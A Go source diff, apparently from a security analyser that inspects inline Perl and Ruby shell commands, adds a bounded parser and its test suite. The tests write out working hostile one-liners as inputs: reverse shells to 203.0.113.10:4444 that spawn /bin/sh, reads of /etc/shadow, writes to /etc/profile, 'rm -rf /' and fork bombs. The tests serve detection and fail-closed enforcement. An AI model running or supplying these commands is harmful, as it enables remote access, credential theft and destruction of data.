+		parser.ir.flows = append(parser.ir.flows, inlineFlowFact{from: DataStdout, to: DataNetwork})
+		return true
+	}
+	return false
+}
+
+func (parser *inlineParser) parseRubyFileCall() bool {
+	if !parser.consumeIdent("File") || !parser.consumeSymbol(".") ||
+		parser.peek().kind != inlineTokenIdent {
+		return false
+	}
+	method := parser.take().text
+	if !parser.consumeSymbol("(") {
+		return false
+	}
+	pathValue, ok := parser.parseExpression()
+	if !ok || pathValue.kind != inlineValueString || !validInlinePOSIXPath(pathValue.text) {
+		return false
+	}
+	var operation OperationKind
+	var access PathAccess
+	switch method {
+	case "read":
+		operation, access = OperationRead, PathAccessRead
+	case "write":
+		if !parser.consumeSymbol(",") {
+			return false
+		}
+		value, valueOK := parser.parseExpression()
+		if !valueOK || value.kind != inlineValueString {
+			return false
+		}
+		operation, access = OperationWrite, PathAccessWrite
+	case "delete", "unlink":
+		operation, access = OperationDelete, PathAccessDelete
+	default:
+		return false
+	}
+	if !parser.consumeSymbol(")") {
+		return false
+	}
+	parser.addOperation(operation)
+	parser.ir.paths = append(parser.ir.paths, inlinePathFact{access: access, value: pathValue.text})
+	return true
+}
+
+func (parser *inlineParser) parseRubyReopen() bool {
+	descriptor := parser.take().text
+	if !parser.consumeSymbol(".") || !parser.consumeIdent("reopen") ||
+		!parser.consumeSymbol("(") || parser.peek().kind != inlineTokenIdent {
+		return false
+	}
+	socket := parser.take().text
+	if !parser.consumeSymbol(")") || parser.symbols[socket].kind != inlineValueSocket {
+		return false
+	}
+	if descriptor == "STDIN" {
+		parser.ir.flows = append(parser.ir.flows, inlineFlowFact{from: DataNetwork, to: DataStdin})
+	} else {
+		parser.ir.flows = append(parser.ir.flows, inlineFlowFact{from: DataStdout, to: DataNetwork})
+	}
+	return true
+}
+
+func (parser *inlineParser) parseChildCall(exec bool) bool {
+	name := parser.take().text
+	if name != "system" && name != "exec" || !parser.consumeSymbol("(") {
+		return false
+	}
+	arguments := make([]string, 0, 4)
+	for {
+		value, ok := parser.parseExpression()
+		if !ok || value.kind != inlineValueString {
+			return false
+		}
+		arguments = append(arguments, value.text)
+		if !parser.consumeSymbol(",") {
+			break
+		}
+	}
+	if !parser.consumeSymbol(")") || len(arguments) == 0 {
+		return false
+	}
+	if exec && len(arguments) == 1 {
+		// Scalar exec uses language-specific command-line/shell semantics;
+		// only explicit argv-list replacement is modeled here.
+		return false
+	}
+	child := inlineChildSpec{exec: exec}
+	if !exec && parser.program == "ruby" && len(arguments) == 1 {
+		if strings.TrimSpace(arguments[0]) == "" || len(arguments[0]) > maxScalarBytes {
+			return false
+		}
+		child.source = arguments[0]
+	} else {
+		if !exec && parser.program == "perl" && len(arguments) < 2 {
+			return false
+		}
+		child.argv = cloneSlice(arguments)
+	}
+	parser.ir.children = append(parser.ir.children, child)
+	return true
+}
+
+func validInlinePOSIXPath(value string) bool {
+	return value != "" && len(value) <= maxScalarBytes && path.IsAbs(value) &&
+		path.Clean(value) == value && !strings.ContainsAny(value, `$~*?[]{}\\`)
+}
+
+func (parser *inlineParser) parseExpression() (inlineValue, bool) {
+	return parser.parseAdditive()
+}
+
+func (parser *inlineParser) parseAdditive() (inlineValue, bool) {
+	left, ok := parser.parseMultiplicative()
+	if !ok {
+		return inlineValue{}, false
+	}
+	for parser.peek().kind == inlineTokenSymbol &&
+		(parser.peekText() == "+" || parser.peekText() == "-") {
+		operator := parser.take().text
+		right, rightOK := parser.parseMultiplicative()
+		if !rightOK || left.kind != inlineValueInteger || right.kind != inlineValueInteger {
+			return inlineValue{}, false
+		}
+		if operator == "+" {
+			if right.num > 0 && left.num > math.MaxInt64-right.num ||
+				right.num < 0 && left.num < math.MinInt64-right.num {
+				return inlineValue{}, false
+			}
+			left.num += right.num
+		} else {
+			if right.num == math.MinInt64 || right.num > 0 && left.num < math.MinInt64+right.num ||
+				right.num < 0 && left.num > math.MaxInt64+right.num {
+				return inlineValue{}, false
+			}
+			left.num -= right.num
+		}
+	}
+	return left, true
+}
+
+func (parser *inlineParser) parseMultiplicative() (inlineValue, bool) {
+	left, ok := parser.parseUnary()
+	if !ok {
+		return inlineValue{}, false
+	}
+	for parser.peek().kind == inlineTokenSymbol && parser.peekText() == "*" {
+		parser.take()
+		right, rightOK := parser.parseUnary()
+		if !rightOK || left.kind != inlineValueInteger || right.kind != inlineValueInteger {
+			return inlineValue{}, false
+		}
+		if left.num != 0 && (left.num == math.MinInt64 && right.num == -1 ||
+			right.num != 0 && left.num*right.num/right.num != left.num) {
+			return inlineValue{}, false
+		}
+		left.num *= right.num
+	}
+	return left, true
+}
+
+func (parser *inlineParser) parseUnary() (inlineValue, bool) {
+	if parser.consumeSymbol("+") {
+		if parser.program == "perl" && (parser.peekText() == "+" || parser.peekText() == "-") {
+			return inlineValue{}, false
+		}
+		value, ok := parser.parseUnary()
+		if !ok || value.kind != inlineValueInteger {
+			return inlineValue{}, false
+		}
+		return value, true
+	}
+	if parser.consumeSymbol("-") {
+		if parser.program == "perl" && (parser.peekText() == "+" || parser.peekText() == "-") {
+			return inlineValue{}, false
+		}
+		value, ok := parser.parseUnary()
+		if !ok || value.kind != inlineValueInteger || value.num == math.MinInt64 {
+			return inlineValue{}, false
+		}
+		value.num = -value.num
+		return value, true
+	}
+	return parser.parsePrimary()
+}
+
+func (parser *inlineParser) parsePrimary() (inlineValue, bool) {
+	if parser.depth >= maxInlineInterpreterDepth {
+		return inlineValue{}, false
+	}
+	parser.depth++
+	defer func() { parser.depth-- }()
+	token := parser.peek()
+	var value inlineValue
+	switch token.kind {
+	case inlineTokenString:
+		parser.take()
+		value = inlineValue{kind: inlineValueString, text: token.text}
+	case inlineTokenNumber:
+		parser.take()
+		if len(token.text) > 1 && token.text[0] == '0' {
+			return inlineValue{}, false
+		}
+		number, err := strconv.ParseInt(token.text, 10, 64)
+		if err != nil {
+			return inlineValue{}, false
+		}
+		value = inlineValue{kind: inlineValueInteger, num: number}
+	case inlineTokenVariable, inlineTokenIdent:
+		parser.take()
+		known, exists := parser.symbols[token.text]
+		if !exists || known.kind == inlineValueSocket || known.kind == inlineValueHandle {
+			return inlineValue{}, false
+		}
+		value = known
+	case inlineTokenSymbol:
+		if token.text == "(" {
+			parser.take()
+			inner, ok := parser.parseExpression()
+			if !ok || !parser.consumeSymbol(")") {
+				return inlineValue{}, false
+			}
+			value = inner
+		} else if token.text == "[" {
+			parser.take()
+			items := make([]inlineValue, 0, 4)
+			if !parser.consumeSymbol("]") {
+				for {
+					item, ok := parser.parseExpression()
+					if !ok || item.kind == inlineValueSocket || item.kind == inlineValueHandle ||
+						len(items) >= maxInlineInterpreterCollection {
+						return inlineValue{}, false
+					}
+					items = append(items, item)
+					if parser.consumeSymbol("]") {
+						break
+					}
+					if !parser.consumeSymbol(",") {
+						return inlineValue{}, false
+					}
+				}
+			}
+			value = inlineValue{kind: inlineValueArray, items: items}
+		} else {
+			return inlineValue{}, false
+		}
+	default:
+		return inlineValue{}, false
+	}
+	for parser.program == "ruby" && parser.consumeSymbol(".") {
+		if !parser.consumeIdent("join") || value.kind != inlineValueArray ||
+			!parser.consumeSymbol("(") {
+			return inlineValue{}, false
+		}
+		separator, ok := parser.parseExpression()
+		if !ok || separator.kind != inlineValueString || !parser.consumeSymbol(")") {
+			return inlineValue{}, false
+		}
+		parts := make([]string, len(value.items))
+		joinedBytes := 0
+		for index, item := range value.items {
+			switch item.kind {
+			case inlineValueString:
+				parts[index] = item.text
+			case inlineValueInteger:
+				parts[index] = strconv.FormatInt(item.num, 10)
+			default:
+				return inlineValue{}, false
+			}
+			if len(parts[index]) > maxScalarBytes-joinedBytes {
+				return inlineValue{}, false
+			}
+			joinedBytes += len(parts[index])
+			if index > 0 {
+				if len(separator.text) > maxScalarBytes-joinedBytes {
+					return inlineValue{}, false
+				}
+				joinedBytes += len(separator.text)
+			}
+		}
+		value = inlineValue{kind: inlineValueString, text: strings.Join(parts, separator.text)}
+	}
+	return value, true
+}
+
+func (parser *inlineParser) addOperation(operation OperationKind) {
+	for _, existing := range parser.ir.operations {
+		if existing == operation {
+			return
+		}
+	}
+	parser.ir.operations = append(parser.ir.operations, operation)
+}
+
+func (parser *inlineParser) symbolDefined(name string) bool {
+	_, exists := parser.symbols[name]
+	return exists
+}
+
+func (parser *inlineParser) defineSymbol(name string, value inlineValue) bool {
+	if name == "" || parser.symbolDefined(name) || len(parser.symbols) >= maxInlineInterpreterSymbols {
+		return false
+	}
+	parser.symbols[name] = value
+	return true
+}
+
+func (parser *inlineParser) atEOF() bool {
+	return parser.peek().kind == inlineTokenEOF
+}
+
+func (parser *inlineParser) peek() inlineToken {
+	return parser.peekN(0)
+}
+
+func (parser *inlineParser) peekN(offset int) inlineToken {
+	index := parser.position + offset
+	if index < 0 || index >= len(parser.tokens) {
+		return inlineToken{kind: inlineTokenEOF}
+	}
+	return parser.tokens[index]
+}
+
+func (parser *inlineParser) peekText() string {
+	return parser.peek().text
+}
+
+func (parser *inlineParser) take() inlineToken {
+	token := parser.peek()
+	if parser.position < len(parser.tokens) {
+		parser.position++
+	}
+	return token
+}
+
+func (parser *inlineParser) consumeIdent(value string) bool {
+	if parser.peek().kind != inlineTokenIdent || parser.peek().text != value {
+		return false
+	}
+	parser.position++
+	return true
+}
+
+func (parser *inlineParser) consumeSymbol(value string) bool {
+	if parser.peek().kind != inlineTokenSymbol || parser.peek().text != value {
+		return false
+	}
+	parser.position++
+	return true
+}

--- a/internal/actionfacts/inline_interpreter_test.go
+++ b/internal/actionfacts/inline_interpreter_test.go
@@ -1,0 +1,863 @@
+// Copyright 2026 Cisco Systems, Inc. and its affiliates
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package actionfacts
+
+import (
+	"strconv"
+	"strings"
+	"testing"
+)
+
+func TestBoundedInlineInterpreterRecognizesBenignBodies(t *testing.T) {
+	for _, test := range []struct {
+		name    string
+		input   Input
+		program string
+	}{
+		{
+			name:    "Perl print",
+			input:   Input{Tool: "shell", Command: `perl -T -f -e 'print 1'`, CWD: "/repo"},
+			program: "perl",
+		},
+		{
+			name:    "Ruby puts",
+			input:   Input{Tool: "shell", Command: `ruby -e 'puts 1'`, CWD: "/repo"},
+			program: "ruby",
+		},
+		{
+			name: "Ruby static collection transform",
+			input: Input{
+				Tool: "shell", Command: `ruby -e 'items = ["a", "b"]; puts items.join("-")'`, CWD: "/repo",
+			},
+			program: "ruby",
+		},
+		{
+			name: "Perl warnings and static arithmetic",
+			input: Input{
+				Tool: "shell", Command: `perl -T -f -we 'my $n = 2 + 3; print $n'`, CWD: "/repo",
+			},
+			program: "perl",
+		},
+		{
+			name: "Perl repeated inline fragments",
+			input: Input{
+				Tool: "shell", Argv: []string{"/usr/bin/perl", "-T", "-f", "-e", "print 1;", "-e", "print 2"},
+				CWD: "/repo", DialectHint: DialectPOSIX,
+			},
+			program: "perl",
+		},
+		{
+			name: "Ruby joined inline fragment",
+			input: Input{
+				Tool: "shell", Argv: []string{"/usr/bin/ruby", "-eputs 1"},
+				CWD: "/repo", DialectHint: DialectPOSIX,
+			},
+			program: "ruby",
+		},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := Analyze(test.input)
+			assertFactsInvariants(t, facts)
+			if !facts.Authoritative() || !facts.EnforcementEligible() {
+				t.Fatalf("fully consumed inline body is not authoritative: %+v", facts)
+			}
+			command := inlineInterpreterCommand(t, facts, test.program)
+			if test.program == "perl" && !RecognizesPOSIXPerlInlineBody(command) ||
+				test.program == "ruby" && !RecognizesPOSIXRubyInlineBody(command) {
+				t.Fatalf("inline body recognition failed: %+v", command)
+			}
+		})
+	}
+}
+
+func TestBoundedInlineInterpreterAcceptedInvocationFormsRemainAuthoritative(t *testing.T) {
+	for _, test := range []struct {
+		name    string
+		input   Input
+		program string
+	}{
+		{name: "plain Perl", input: Input{Tool: "shell", Command: `perl -e 'print 1'`, CWD: "/repo"}, program: "perl"},
+		{name: "Perl taint without no-sitecustomize", input: Input{Tool: "shell", Command: `perl -T -e 'print 1'`, CWD: "/repo"}, program: "perl"},
+		{name: "Perl no-sitecustomize without taint", input: Input{Tool: "shell", Command: `perl -f -e 'print 1'`, CWD: "/repo"}, program: "perl"},
+		{name: "plain Ruby", input: Input{Tool: "shell", Command: `ruby -e 'puts 1'`, CWD: "/repo"}, program: "ruby"},
+		{name: "Ruby disable gems", input: Input{Tool: "shell", Command: `ruby --disable-gems -e 'puts 1'`, CWD: "/repo"}, program: "ruby"},
+		{name: "Ruby disable gems and rubyopt", input: Input{Tool: "shell", Command: `ruby --disable=gems,rubyopt -e 'items = ["a", "b"]; puts items.join("-")'`, CWD: "/repo"}, program: "ruby"},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := Analyze(test.input)
+			assertFactsInvariants(t, facts)
+			if !facts.Authoritative() || !facts.EnforcementEligible() {
+				t.Fatalf("accepted visible invocation is not authoritative: %+v", facts)
+			}
+			command := inlineInterpreterCommand(t, facts, test.program)
+			if test.program == "perl" {
+				if !RecognizesPOSIXPerlInlineBody(command) {
+					t.Fatalf("Perl body recognition failed: %+v", command)
+				}
+			} else if !RecognizesPOSIXRubyInlineBody(command) {
+				t.Fatalf("Ruby body recognition failed: %+v", command)
+			}
+		})
+	}
+}
+
+func TestBoundedInlineInterpreterProjectsSecurityEffects(t *testing.T) {
+	for _, test := range []struct {
+		name          string
+		command       string
+		program       string
+		operation     OperationKind
+		pathAccess    PathAccess
+		path          string
+		network       string
+		port          int64
+		authoritative bool
+	}{
+		{
+			name: "Perl sensitive read", command: `perl -T -f -e 'open(my $fh, "<", "/etc/shadow")'`,
+			program: "perl", operation: OperationRead, pathAccess: PathAccessRead, path: "/etc/shadow", authoritative: true,
+		},
+		{
+			name: "Ruby sensitive read", command: `ruby -e 'File.read("/etc/shadow")'`,
+			program: "ruby", operation: OperationRead, pathAccess: PathAccessRead, path: "/etc/shadow", authoritative: true,
+		},
+		{
+			name: "Perl profile append", command: `perl -T -f -e 'open(my $fh, ">>", "/etc/profile")'`,
+			program: "perl", operation: OperationAppend, pathAccess: PathAccessAppend, path: "/etc/profile", authoritative: true,
+		},
+		{
+			name: "Ruby profile write", command: `ruby -e 'File.write("/etc/profile", "x")'`,
+			program: "ruby", operation: OperationWrite, pathAccess: PathAccessWrite, path: "/etc/profile", authoritative: true,
+		},
+		{
+			name:    "Perl outbound socket",
+			command: `perl -e 'use IO::Socket::INET; my $s = IO::Socket::INET->new(PeerAddr => "203.0.113.10", PeerPort => 4444, Proto => "tcp")'`,
+			program: "perl", operation: OperationConnect, network: "203.0.113.10", port: 4444,
+		},
+		{
+			name:    "Ruby outbound socket",
+			command: `ruby -e 'require "socket"; s = TCPSocket.new("203.0.113.10", 4444)'`,
+			program: "ruby", operation: OperationConnect, network: "203.0.113.10", port: 4444,
+		},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := Analyze(Input{Tool: "shell", Command: test.command, CWD: "/repo"})
+			assertFactsInvariants(t, facts)
+			if got := facts.Authoritative() && facts.EnforcementEligible(); got != test.authoritative {
+				t.Fatalf("authoritative/enforceable = %t, want %t: %+v", got, test.authoritative, facts)
+			}
+			owner := inlineInterpreterCommand(t, facts, test.program)
+			if !inlineCommandHasOperation(owner, test.operation) {
+				t.Fatalf("operations = %v, want %s", owner.Operations, test.operation)
+			}
+			if test.path != "" && !inlineFactsHavePath(facts, owner.ID, test.pathAccess, test.path) {
+				t.Fatalf("paths = %+v, want %s %q", facts.Paths, test.pathAccess, test.path)
+			}
+			if test.network != "" && !inlineFactsHaveNetwork(facts, owner.ID, test.network, test.port) {
+				t.Fatalf("network = %+v, want %s:%d", facts.Network, test.network, test.port)
+			}
+		})
+	}
+}
+
+func TestBoundedInlineInterpreterLanguageSpecificExpressionsFailClosed(t *testing.T) {
+	for _, test := range []struct {
+		name    string
+		command string
+		program string
+	}{
+		{
+			name: "Perl rejects Ruby-style array join",
+			command: `perl -T -f -e 'my $parts = ["/etc", "shadow"]; ` +
+				`open(my $fh, "<", $parts.join("/"))'`,
+			program: "perl",
+		},
+		{
+			name: "Ruby rejects language-dependent integer division",
+			command: `ruby -e 'require "socket"; portx = 5 + -3 / 2; ` +
+				`s = TCPSocket.new("203.0.113.10", portx)'`,
+			program: "ruby",
+		},
+		{
+			name: "Ruby rejects reassigned socket constant",
+			command: `ruby -e 'require "socket"; TCPSocket = "x"; ` +
+				`s = TCPSocket.new("203.0.113.10", 4444)'`,
+			program: "ruby",
+		},
+		{
+			name:    "Ruby rejects non-string file write data",
+			command: `ruby -e 'File.write("/etc/profile", 1)'`,
+			program: "ruby",
+		},
+		{
+			name:    "Ruby rejects pseudo-file assignment",
+			command: `ruby -e '__FILE__ = 1; File.read("/etc/shadow")'`,
+			program: "ruby",
+		},
+		{
+			name:    "Ruby rejects namespace assignment",
+			command: `ruby -e 'foo::bar = 1; File.read("/etc/shadow")'`,
+			program: "ruby",
+		},
+		{
+			name:    "Ruby rejects numbered parameter assignment",
+			command: `ruby -e '_1 = 1; File.read("/etc/shadow")'`,
+			program: "ruby",
+		},
+		{
+			name:    "Ruby rejects newline before system arguments",
+			command: "ruby -e 'system\n(\"rm -rf /\")'",
+			program: "ruby",
+		},
+		{
+			name:    "Ruby rejects newline before exec arguments",
+			command: "ruby -e 'exec\n(\"/bin/sh\", \"-i\")'",
+			program: "ruby",
+		},
+		{
+			name:    "Ruby rejects newline before file arguments",
+			command: "ruby -e 'File.write\n(\"/etc/profile\", \"x\")'",
+			program: "ruby",
+		},
+		{
+			name:    "Ruby rejects printf before a sensitive effect",
+			command: `ruby -e 'printf(1); File.read("/etc/shadow")'`,
+			program: "ruby",
+		},
+		{
+			name:    "Perl rejects printf before a sensitive effect",
+			command: `perl -e 'printf "%999999999999999999999999999999d", 1; open(my $fh, "<", "/etc/shadow")'`,
+			program: "perl",
+		},
+		{
+			name:    "Ruby rejects bare trailing diagnostic comma",
+			command: `ruby -e 'puts 1,; File.read("/etc/shadow")'`,
+			program: "ruby",
+		},
+		{
+			name:    "Perl rejects adjacent decrement tokens",
+			command: `perl -e 'print --1; open(my $fh, "<", "/etc/shadow")'`,
+			program: "perl",
+		},
+		{
+			name:    "Perl rejects adjacent increment tokens",
+			command: `perl -e 'print ++1; open(my $fh, "<", "/etc/shadow")'`,
+			program: "perl",
+		},
+		{
+			name:    "Perl rejects binary decrement token",
+			command: `perl -e 'print 1--1; open(my $fh, "<", "/etc/shadow")'`,
+			program: "perl",
+		},
+		{
+			name:    "Perl rejects binary increment token",
+			command: `perl -e 'print 1++2; open(my $fh, "<", "/etc/shadow")'`,
+			program: "perl",
+		},
+		{
+			name:    "Perl rejects quoted child callee",
+			command: `perl -e '"system"("/bin/rm", "-rf", "/tmp/x")'`,
+			program: "perl",
+		},
+		{
+			name:    "Ruby rejects quoted exec callee",
+			command: `ruby -e '"exec"("/bin/sh", "-i")'`,
+			program: "ruby",
+		},
+		{
+			name:    "Perl rejects string additive operator",
+			command: `perl -e 'my $n = 1 "+" 2; open(my $fh, "<", "/etc/shadow")'`,
+			program: "perl",
+		},
+		{
+			name:    "Ruby rejects string multiplicative operator",
+			command: `ruby -e 'n = 1 "*" 2; File.read("/etc/shadow")'`,
+			program: "ruby",
+		},
+		{
+			name: "Perl INET rejects IPv6 literal",
+			command: `perl -e 'use IO::Socket::INET; my $s = IO::Socket::INET->new(` +
+				`PeerAddr => "::1", PeerPort => 4444, Proto => "tcp")'`,
+			program: "perl",
+		},
+		{
+			name: "Perl INET rejects IPv4-mapped IPv6 literal",
+			command: `perl -e 'use IO::Socket::INET; my $s = IO::Socket::INET->new(` +
+				`PeerAddr => "::ffff:127.0.0.1", PeerPort => 4444, Proto => "tcp")'`,
+			program: "perl",
+		},
+		{
+			name:    "Ruby rejects unary plus on array",
+			command: `ruby -e 'items = +(["/etc", "profile"]); File.write(items.join("/"), "x")'`,
+			program: "ruby",
+		},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := Analyze(Input{Tool: "shell", Command: test.command, CWD: "/repo"})
+			assertFactsInvariants(t, facts)
+			if facts.Authoritative() || facts.EnforcementEligible() ||
+				len(facts.Paths) != 0 || len(facts.Network) != 0 {
+				t.Fatalf("language-specific expression projected false facts: %+v", facts)
+			}
+			owner := inlineInterpreterCommand(t, facts, test.program)
+			if RecognizesPOSIXPerlInlineBody(owner) || RecognizesPOSIXRubyInlineBody(owner) {
+				t.Fatalf("unsupported expression acquired body recognition: %+v", owner)
+			}
+		})
+	}
+
+	facts := Analyze(Input{
+		Tool: "shell",
+		Command: `ruby -e 'require "socket"; portx = 4000 + 444; ` +
+			`s = TCPSocket.new("203.0.113.10", portx)'`,
+		CWD: "/repo",
+	})
+	assertFactsInvariants(t, facts)
+	owner := inlineInterpreterCommand(t, facts, "ruby")
+	if !inlineFactsHaveNetwork(facts, owner.ID, "203.0.113.10", 4444) {
+		t.Fatalf("Ruby addition control lost its exact network fact: %+v", facts)
+	}
+}
+
+func TestBoundedInlineInterpreterDerivedStringLimitFailsClosed(t *testing.T) {
+	body := `x0="aaaaaaaaaaaaaaaa"`
+	for index := 1; index <= 12; index++ {
+		body += `; x` + strconv.Itoa(index) + `=[x` + strconv.Itoa(index-1) +
+			`,x` + strconv.Itoa(index-1) + `].join(x` + strconv.Itoa(index-1) + `)`
+	}
+	body += `; File.read(x12)`
+	facts := Analyze(Input{
+		Tool: "shell", Argv: []string{"ruby", "-e", body}, CWD: "/repo", DialectHint: DialectPOSIX,
+	})
+	assertFactsInvariants(t, facts)
+	if facts.Authoritative() || facts.EnforcementEligible() || len(facts.Paths) != 0 {
+		t.Fatalf("oversized derived string produced authoritative facts: %+v", facts)
+	}
+	owner := inlineInterpreterCommand(t, facts, "ruby")
+	if RecognizesPOSIXRubyInlineBody(owner) {
+		t.Fatalf("oversized derived string acquired body recognition: %+v", owner)
+	}
+}
+
+func TestBoundedInlineInterpreterRecursesIntoStaticSystemAndExec(t *testing.T) {
+	for _, test := range []struct {
+		name          string
+		command       string
+		program       string
+		child         string
+		operation     OperationKind
+		pathAccess    PathAccess
+		path          string
+		wantReplace   bool
+		authoritative bool
+		wantPartial   bool
+	}{
+		{
+			name: "Perl argv system delete", command: `perl -T -f -e 'system("/bin/rm", "-rf", "/")'`,
+			program: "perl", child: "rm", operation: OperationDelete, pathAccess: PathAccessDelete, path: "/", authoritative: true,
+		},
+		{
+			name: "Ruby string system delete", command: `ruby -e 'system("rm -rf /")'`,
+			program: "ruby", child: "rm", operation: OperationDelete, pathAccess: PathAccessDelete, path: "/", authoritative: true,
+		},
+		{
+			name: "Perl exact exec", command: `perl -e 'exec("/bin/sh", "-i")'`,
+			program: "perl", child: "sh", operation: OperationExecute, wantReplace: true,
+		},
+		{
+			name: "Ruby exact exec", command: `ruby -e 'exec("/bin/sh", "-i")'`,
+			program: "ruby", child: "sh", operation: OperationExecute, wantReplace: true,
+		},
+		{
+			name: "Perl mixed-case shell is not proven", command: `perl -e 'exec("/bin/Sh", "-i")'`,
+			program: "perl", child: "sh", operation: OperationExecute,
+		},
+		{
+			name: "Ruby mixed-case shell is not proven", command: `ruby -e 'exec("/bin/Sh", "-i")'`,
+			program: "ruby", child: "sh", operation: OperationExecute,
+		},
+		{
+			name: "Perl mixed-case shell directory is not proven", command: `perl -e 'exec("/USR/bin/sh", "-i")'`,
+			program: "perl", child: "sh", operation: OperationExecute, wantPartial: true,
+		},
+		{
+			name: "Perl mixed-case child stays partial", command: `perl -e 'system("/bin/Rm", "-rf", "/tmp/x")'`,
+			program: "perl", child: "rm", operation: OperationDelete, pathAccess: PathAccessDelete, path: "/tmp/x", wantPartial: true,
+		},
+		{
+			name: "Perl mixed-case child directory stays partial", command: `perl -e 'system("/USR/bin/rm", "-rf", "/tmp/x")'`,
+			program: "perl", child: "rm", operation: OperationDelete, pathAccess: PathAccessDelete, path: "/tmp/x", wantPartial: true,
+		},
+		{
+			name: "Perl wrapped mixed-case child stays partial", command: `perl -e 'system("env", "/bin/Rm", "-rf", "/tmp/x")'`,
+			program: "perl", child: "env", operation: OperationExecute, wantPartial: true,
+		},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := Analyze(Input{Tool: "shell", Command: test.command, CWD: "/repo"})
+			assertFactsInvariants(t, facts)
+			if got := facts.Authoritative() && facts.EnforcementEligible(); got != test.authoritative {
+				t.Fatalf("authoritative/enforceable = %t, want %t: %+v", got, test.authoritative, facts)
+			}
+			if test.wantPartial && facts.Authoritative() {
+				t.Fatalf("mixed-case child unexpectedly remained authoritative: %+v", facts)
+			}
+			owner := inlineInterpreterCommand(t, facts, test.program)
+			child := inlineInterpreterChild(t, facts, owner.ID, test.child)
+			if !inlineCommandHasOperation(child, test.operation) {
+				t.Fatalf("child operations = %v, want %s", child.Operations, test.operation)
+			}
+			if test.path != "" && !inlineFactsHavePath(facts, child.ID, test.pathAccess, test.path) {
+				t.Fatalf("paths = %+v, want child %s %q", facts.Paths, test.pathAccess, test.path)
+			}
+			if inlineFactsHaveFlow(facts, child.ID, owner.ID, DataStdout, DataProcess) {
+				t.Fatalf("system/exec child acquired a false stdout-to-parent flow: %+v", facts)
+			}
+			if test.wantReplace && !ProvesPOSIXInlineInterpreterShellExec(facts, owner.ID) {
+				t.Fatalf("exact shell exec proof failed: %+v", facts)
+			}
+		})
+	}
+}
+
+func TestBoundedInlineInterpreterProjectsReverseShellFlow(t *testing.T) {
+	for _, test := range []struct {
+		name    string
+		program string
+		command string
+	}{
+		{
+			name:    "Perl socket stdio shell",
+			program: "perl",
+			command: `perl -e 'use IO::Socket::INET; my $s = IO::Socket::INET->new(PeerAddr => "203.0.113.10", PeerPort => 4444, Proto => "tcp"); open(STDIN, "<&", $s); open(STDOUT, ">&", $s); exec("/bin/sh", "-i")'`,
+		},
+		{
+			name:    "Ruby socket stdio shell",
+			program: "ruby",
+			command: `ruby -e 'require "socket"; s = TCPSocket.new("203.0.113.10", 4444); STDIN.reopen(s); STDOUT.reopen(s); exec("/bin/sh", "-i")'`,
+		},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := Analyze(Input{Tool: "shell", Command: test.command, CWD: "/repo"})
+			assertFactsInvariants(t, facts)
+			if facts.Authoritative() || facts.EnforcementEligible() {
+				t.Fatalf("reverse shell must remain non-authoritative: %+v", facts)
+			}
+			owner := inlineInterpreterCommand(t, facts, test.program)
+			if !inlineFactsHaveNetwork(facts, owner.ID, "203.0.113.10", 4444) ||
+				!inlineFactsHaveFlow(facts, 0, owner.ID, DataNetwork, DataStdin) ||
+				!inlineFactsHaveFlow(facts, owner.ID, 0, DataStdout, DataNetwork) ||
+				!ProvesPOSIXInlineInterpreterShellExec(facts, owner.ID) {
+				t.Fatalf("reverse-shell facts are incomplete: %+v", facts)
+			}
+		})
+	}
+}
+
+func TestBoundedInlineInterpreterForkBombProofIsExact(t *testing.T) {
+	for _, test := range []struct {
+		name    string
+		command string
+		program string
+		want    bool
+	}{
+		{name: "Perl exact", command: `perl -T -f -e 'fork while fork'`, program: "perl", want: true},
+		{name: "Perl exact trailing separator", command: `perl -T -f -e 'fork while fork;'`, program: "perl", want: true},
+		{name: "Perl inert string", command: `perl -e 'print "fork while fork"'`, program: "perl"},
+		{name: "Perl extra statement", command: `perl -e 'fork while fork; print 1'`, program: "perl"},
+		{name: "Ruby exact", command: `ruby -e 'loop { fork }'`, program: "ruby", want: true},
+		{name: "Ruby exact trailing separator", command: `ruby -e 'loop { fork };'`, program: "ruby", want: true},
+		{name: "Ruby bounded loop", command: `ruby -e '2.times { puts 1 }'`, program: "ruby"},
+		{name: "Ruby string braces", command: `ruby -e 'loop "{" fork "}"'`, program: "ruby"},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := Analyze(Input{Tool: "shell", Command: test.command, CWD: "/repo"})
+			assertFactsInvariants(t, facts)
+			command := inlineInterpreterCommand(t, facts, test.program)
+			if got := ProvesPOSIXInlineInterpreterForkBomb(command); got != test.want {
+				t.Fatalf("fork-bomb proof = %t, want %t: %+v", got, test.want, facts)
+			}
+			if test.want && (!facts.Authoritative() || !facts.EnforcementEligible()) {
+				t.Fatalf("fully consumed fork body is not authoritative: %+v", facts)
+			}
+		})
+	}
+}
+
+func TestBoundedInlineInterpreterFailedParseCommitsNoPartialFacts(t *testing.T) {
+	for _, test := range []struct {
+		name    string
+		command string
+		program string
+	}{
+		{
+			name: "Perl read before unknown call", program: "perl",
+			command: `perl -e 'open(my $fh, "<", "/etc/shadow"); Example::Unknown::call("x")'`,
+		},
+		{
+			name: "Perl filehandle is not a string child argument", program: "perl",
+			command: `perl -e 'open(my $fh, "<", "/etc/shadow"); system("/bin/rm", $fh)'`,
+		},
+		{
+			name: "Perl filehandle cannot hide in an array", program: "perl",
+			command: `perl -e 'open(my $fh, "<", "/etc/shadow"); my $items = [$fh]; print 1'`,
+		},
+		{
+			name: "Ruby write before eval", program: "ruby",
+			command: `ruby -e 'File.write("/etc/profile", "x"); eval("puts 1")'`,
+		},
+		{
+			name: "Ruby relative path", program: "ruby",
+			command: `ruby -e 'File.read("relative.txt")'`,
+		},
+	} {
+		t.Run(test.name, func(t *testing.T) {
+			facts := Analyze(Input{Tool: "shell", Command: test.command, CWD: "/repo"})
+			assertFactsInvariants(t, facts)
+			if facts.Authoritative() || len(facts.Paths) != 0 || len(facts.Network) != 0 {
